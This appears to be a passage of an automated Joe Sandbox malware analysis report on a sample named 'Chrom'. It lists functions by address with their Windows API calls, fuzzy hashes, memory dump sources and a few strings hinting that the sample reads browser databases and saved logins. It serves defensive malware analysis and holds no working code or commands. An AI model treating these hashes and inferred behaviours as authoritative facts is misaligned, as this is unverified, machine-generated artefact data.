                                                                                                                                                          • Part of subcall function 0040D540: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D5F0,0040E6FB,?,004121F5,00000000,00000000,?), ref: 0040D5D4
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                        • String ID: strings
                                                                                                                                                        • API String ID: 3166385802-3030018805
                                                                                                                                                        • Opcode ID: 83f2c4dafeecc99ee3eef0caec914b4911d667406a77c7368fe1af62c77103f1
                                                                                                                                                        • Instruction ID: b1470fe84c434e0d92e5d9d764ba88a8e864f1e5bfb716432bcb129c57bfcb41
                                                                                                                                                        • Opcode Fuzzy Hash: 83f2c4dafeecc99ee3eef0caec914b4911d667406a77c7368fe1af62c77103f1
                                                                                                                                                        • Instruction Fuzzy Hash: 204160759003019BD71EDF9AED819263365F788306710087AE906972A3DF36EA89CB6D
                                                                                                                                                        Function 0040AA19 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 65COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 0040AA3A
                                                                                                                                                        • _snwprintf.MSVCRT ref: 0040AA6D
                                                                                                                                                        • wcslen.MSVCRT ref: 0040AA79
                                                                                                                                                        • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040AA91
                                                                                                                                                        • wcslen.MSVCRT ref: 0040AA9F
                                                                                                                                                        • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040AAB2
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                        • String ID: %s (%s)
                                                                                                                                                        • API String ID: 3979103747-1363028141
                                                                                                                                                        • Opcode ID: c6bf2ed547002a79412dcf0007d59944c4ad18f5877495ef8b57a3994eba2edc
                                                                                                                                                        • Instruction ID: b6d6d83be4212d1c483e19f60897e6584e32f0ecf7c368d7e799a2f76849004c
                                                                                                                                                        • Opcode Fuzzy Hash: c6bf2ed547002a79412dcf0007d59944c4ad18f5877495ef8b57a3994eba2edc
                                                                                                                                                        • Instruction Fuzzy Hash: 3C216FB2900218ABDF21EF55CD45D8AB7F8FF04358F058466E948AB102EB74EA18CFD5
                                                                                                                                                        Function 00406F91 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,004552B0,?,?,004116CB,?,General,?,00000000,00000001), ref: 00406FA9
                                                                                                                                                        • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 00406FBA
                                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 00406FC8
                                                                                                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 00406FD8
                                                                                                                                                        • LockResource.KERNEL32(00000000), ref: 00406FE1
                                                                                                                                                        • memcpy.MSVCRT(00000000,00000000,00000000), ref: 00407011
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                                                        • String ID: BIN
                                                                                                                                                        • API String ID: 1668488027-1015027815
                                                                                                                                                        • Opcode ID: 0cc70d90eb5fe2022f84bb375c7f586452e31cf1ff3c5ba81afc9f946eb2bfa1
                                                                                                                                                        • Instruction ID: d4af116c543dc71c648d7e8b177643e8ae674b9e270c37636f22300aa75b878c
                                                                                                                                                        • Opcode Fuzzy Hash: 0cc70d90eb5fe2022f84bb375c7f586452e31cf1ff3c5ba81afc9f946eb2bfa1
                                                                                                                                                        • Instruction Fuzzy Hash: 5F11C635C00225EBC7116BE2DC49DAFBE78FF85765F020836F811B2291DB385D158AA9
                                                                                                                                                        Function 0040DD46 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 0040DD6B
                                                                                                                                                        • GetDlgCtrlID.USER32(?), ref: 0040DD76
                                                                                                                                                        • GetWindowTextW.USER32(?,?,00001000), ref: 0040DD8D
                                                                                                                                                        • memset.MSVCRT ref: 0040DDB4
                                                                                                                                                        • GetClassNameW.USER32(?,?,000000FF), ref: 0040DDCB
                                                                                                                                                        • _wcsicmp.MSVCRT ref: 0040DDDD
                                                                                                                                                          • Part of subcall function 0040DC1C: memset.MSVCRT ref: 0040DC2F
                                                                                                                                                          • Part of subcall function 0040DC1C: _itow.MSVCRT ref: 0040DC3D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                                                        • String ID: sysdatetimepick32
                                                                                                                                                        • API String ID: 1028950076-4169760276
                                                                                                                                                        • Opcode ID: 8102298fea940e88dbedffba4a1eb78ca5cb1cc1c3ab67c0e4d17f8e38664f99
                                                                                                                                                        • Instruction ID: 9b29a85ed4be641e65b10d3861343448fbe1dffed752f9636a38eeae2f61c522
                                                                                                                                                        • Opcode Fuzzy Hash: 8102298fea940e88dbedffba4a1eb78ca5cb1cc1c3ab67c0e4d17f8e38664f99
                                                                                                                                                        • Instruction Fuzzy Hash: 5F11CA329002197BEB14FB91CC49AEF77BCEF05350F004076F908D2092E7344A85CB59
                                                                                                                                                        Function 0041D730 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,00420EBE,00000000,00000000), ref: 0041D868
                                                                                                                                                        • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,00420EBE,00000000,00000000), ref: 0041D87A
                                                                                                                                                        • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,00420EBE,00000000,00000000), ref: 0041D892
                                                                                                                                                        • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,00420EBE,00000000,00000000), ref: 0041D8AF
                                                                                                                                                        • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041D8C7
                                                                                                                                                        • memset.MSVCRT ref: 0041D994
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcpy$memset
                                                                                                                                                        • String ID: -journal$-wal
                                                                                                                                                        • API String ID: 438689982-2894717839
                                                                                                                                                        • Opcode ID: d779981db6e39aa48904ea1662bdb9d3095299d2377483bbb01f90ee736efe62
                                                                                                                                                        • Instruction ID: de08a271c8033e28d41d160dfbeb7eb0a582d0ed0f381ff02535cf89bb22e03f
                                                                                                                                                        • Opcode Fuzzy Hash: d779981db6e39aa48904ea1662bdb9d3095299d2377483bbb01f90ee736efe62
                                                                                                                                                        • Instruction Fuzzy Hash: FFA1C1B1E04606AFDB14DF64C8417DEBBB0FF05314F14826EE46997382D738AA95CB98
                                                                                                                                                        Function 00407278 Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 0040731C
                                                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 0040732F
                                                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00407344
                                                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 0040735C
                                                                                                                                                        • EndDialog.USER32(?,00000002), ref: 00407378
                                                                                                                                                        • EndDialog.USER32(?,00000001), ref: 0040738D
                                                                                                                                                          • Part of subcall function 00407037: GetDlgItem.USER32(?,000003E9), ref: 00407044
                                                                                                                                                          • Part of subcall function 00407037: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00407059
                                                                                                                                                        • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 004073A5
                                                                                                                                                        • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 004074B6
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Item$Dialog$MessageSend
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3975816621-0
                                                                                                                                                        • Opcode ID: 1b8c1b744b44118a1d00fc74b7d8bfeaf52c27222ffa2e36781ac251d1cb99c8
                                                                                                                                                        • Instruction ID: 4d7fe854b84bffb36cdfb0f409f7702d3ffab78e9dfebf1b38e0a9661c8b6889
                                                                                                                                                        • Opcode Fuzzy Hash: 1b8c1b744b44118a1d00fc74b7d8bfeaf52c27222ffa2e36781ac251d1cb99c8
                                                                                                                                                        • Instruction Fuzzy Hash: 9261A330904B05ABEB31AF25C886A2BB7A5FF10314F00C63EFD01A66D1D778B955DB5A
                                                                                                                                                        Function 00446134 Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 154COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _wcsicmp.MSVCRT ref: 004461B4
                                                                                                                                                        • _wcsicmp.MSVCRT ref: 004461C9
                                                                                                                                                        • _wcsicmp.MSVCRT ref: 004461DE
                                                                                                                                                          • Part of subcall function 00409DB6: wcslen.MSVCRT ref: 00409DC5
                                                                                                                                                          • Part of subcall function 00409DB6: wcslen.MSVCRT ref: 00409DCF
                                                                                                                                                          • Part of subcall function 00409DB6: _memicmp.MSVCRT ref: 00409DEA
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                                                                        • String ID: .save$http://$https://$log profile$signIn
                                                                                                                                                        • API String ID: 1214746602-2708368587
                                                                                                                                                        • Opcode ID: c25681c330007c681027023b8fef3e46109c9436a99cce23058c3c7b6e338d58
                                                                                                                                                        • Instruction ID: 5e484990e1fe59e7fa87e07e780c8912ce5a7b58b3c72e29c52105d59935e75b
                                                                                                                                                        • Opcode Fuzzy Hash: c25681c330007c681027023b8fef3e46109c9436a99cce23058c3c7b6e338d58
                                                                                                                                                        • Instruction Fuzzy Hash: 824119711043019AF7306A65984136777D4DB47326F22896FFC6BE26C3EABCE885451F
                                                                                                                                                        Function 004074C6 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 004074D6
                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 004074F2
                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00407518
                                                                                                                                                        • memset.MSVCRT ref: 00407528
                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00407557
                                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 004075A4
                                                                                                                                                        • SetFocus.USER32(?,?,?,?), ref: 004075AD
                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 004075BD
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2313361498-0
                                                                                                                                                        • Opcode ID: e675ad0a266bc96670d571add91fa9578aec271a38db8ff1ba01c2f3931e097b
                                                                                                                                                        • Instruction ID: aa93cf9892cb136432a885b6c040c00acd20fa1824247a7ddfcc4fe67478404c
                                                                                                                                                        • Opcode Fuzzy Hash: e675ad0a266bc96670d571add91fa9578aec271a38db8ff1ba01c2f3931e097b
                                                                                                                                                        • Instruction Fuzzy Hash: E031B0B1901201BFEB20AF29DD8591AB7A4FF04314B11853EF505E76A0D739EC80CBA5
                                                                                                                                                        Function 00407784 Relevance: 12.1, APIs: 8, Instructions: 89windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 0040779B
                                                                                                                                                        • GetWindow.USER32(?,00000005), ref: 004077B3
                                                                                                                                                        • GetWindow.USER32(00000000), ref: 004077B6
                                                                                                                                                          • Part of subcall function 00401E4A: GetWindowRect.USER32(?,?), ref: 00401E59
                                                                                                                                                        • GetWindow.USER32(00000000,00000002), ref: 004077C2
                                                                                                                                                        • GetDlgItem.USER32(?,0000040C), ref: 004077D8
                                                                                                                                                        • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00407817
                                                                                                                                                        • GetDlgItem.USER32(?,0000040E), ref: 00407821
                                                                                                                                                        • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00407870
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$ItemMessageRectSend$Client
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2047574939-0
                                                                                                                                                        • Opcode ID: fe54eeb19441843d95fdd849ea5d8071feeb7e1862c97c4ad6b95fcb8b242d9a
                                                                                                                                                        • Instruction ID: 2817ce33af67de4568897f7594256d54fbf45e6d9d619dfc684942712a2cffd5
                                                                                                                                                        • Opcode Fuzzy Hash: fe54eeb19441843d95fdd849ea5d8071feeb7e1862c97c4ad6b95fcb8b242d9a
                                                                                                                                                        • Instruction Fuzzy Hash: 11219576A4030877E6023B719C47FAF275CAB85718F11403AFE01771C2DABA6D1645AF
                                                                                                                                                        Function 00449D70 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00449C90: memset.MSVCRT ref: 00449C9B
                                                                                                                                                          • Part of subcall function 00449C90: memset.MSVCRT ref: 00449CAB
                                                                                                                                                          • Part of subcall function 00449C90: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000020,?,00000000), ref: 00449D0D
                                                                                                                                                          • Part of subcall function 00449C90: memcpy.MSVCRT(?,?,?,?,?,00000000,00000020,?,00000000), ref: 00449D5A
                                                                                                                                                        • memcpy.MSVCRT(?,?,00000040), ref: 00449E6F
                                                                                                                                                        • memcpy.MSVCRT(?,?,00000004,00000000), ref: 00449EBC
                                                                                                                                                        • memcpy.MSVCRT(?,?,00000040), ref: 00449F38
                                                                                                                                                          • Part of subcall function 004499A0: memcpy.MSVCRT(?,00449AD2,00000040,?,?,?,00449AD2,?,?,?,?,00449EEF,?,?,?,00000000), ref: 004499D2
                                                                                                                                                          • Part of subcall function 004499A0: memcpy.MSVCRT(?,00449AD2,00000008,?,?,?,00449AD2,?,?,?,?,00449EEF,?,?,?,00000000), ref: 00449A1E
                                                                                                                                                        • memcpy.MSVCRT(?,?,00000000), ref: 00449F88
                                                                                                                                                        • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449FC9
                                                                                                                                                        • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 00449FFA
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcpy$memset
                                                                                                                                                        • String ID: gj
                                                                                                                                                        • API String ID: 438689982-4203073231
                                                                                                                                                        • Opcode ID: a1826e050d6e3d68a1f2c5dfa01eae9680517dde8f20abcfd8e35bf37672f032
                                                                                                                                                        • Instruction ID: 3f3b464479e0d70e050848f60aaa72c5089d0acdf18e9fe99dc29a9aef4a41ed
                                                                                                                                                        • Opcode Fuzzy Hash: a1826e050d6e3d68a1f2c5dfa01eae9680517dde8f20abcfd8e35bf37672f032
                                                                                                                                                        • Instruction Fuzzy Hash: 6271B3B39083445BE310EF65D88099FB7E9ABD5348F050A2EF88997201E639DE09C797
                                                                                                                                                        Function 00407103 Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 0040711A
                                                                                                                                                        • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00407133
                                                                                                                                                        • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00407140
                                                                                                                                                        • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 0040714C
                                                                                                                                                        • memset.MSVCRT ref: 004071B0
                                                                                                                                                        • SendMessageW.USER32(?,0000105F,?,?), ref: 004071E5
                                                                                                                                                        • SetFocus.USER32(?), ref: 0040726B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend$FocusItemmemset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4281309102-0
                                                                                                                                                        • Opcode ID: 591c16118d863813ab471e160c4fd565b0629bf706d474ce27cebc159554fed7
                                                                                                                                                        • Instruction ID: e2e651f42ab0d4b7e7b6f1b53d2a0dc89a1afd109539422a1d010a9987f6e0ab
                                                                                                                                                        • Opcode Fuzzy Hash: 591c16118d863813ab471e160c4fd565b0629bf706d474ce27cebc159554fed7
                                                                                                                                                        • Instruction Fuzzy Hash: 8C415A74901219FBDB20DF95CC459AFBFB9FF04354F1040AAF508A6291D374AA80CBA5
                                                                                                                                                        Function 0040F56C Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _snwprintfwcscat
                                                                                                                                                        • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                        • API String ID: 384018552-4153097237
                                                                                                                                                        • Opcode ID: 4bae3b1c020fc46a540f34cadb4edddbf196e78b99bdfbdb6ab0bb772013daad
                                                                                                                                                        • Instruction ID: e0f29f3203d759466a2a243950708939727ff8ca945fdb9ba1a968257c2252f6
                                                                                                                                                        • Opcode Fuzzy Hash: 4bae3b1c020fc46a540f34cadb4edddbf196e78b99bdfbdb6ab0bb772013daad
                                                                                                                                                        • Instruction Fuzzy Hash: 8A31A031A00208EFCF10AF54CC85ADE7B75FF05324F11417AE805AB2A2D739AD55DB94
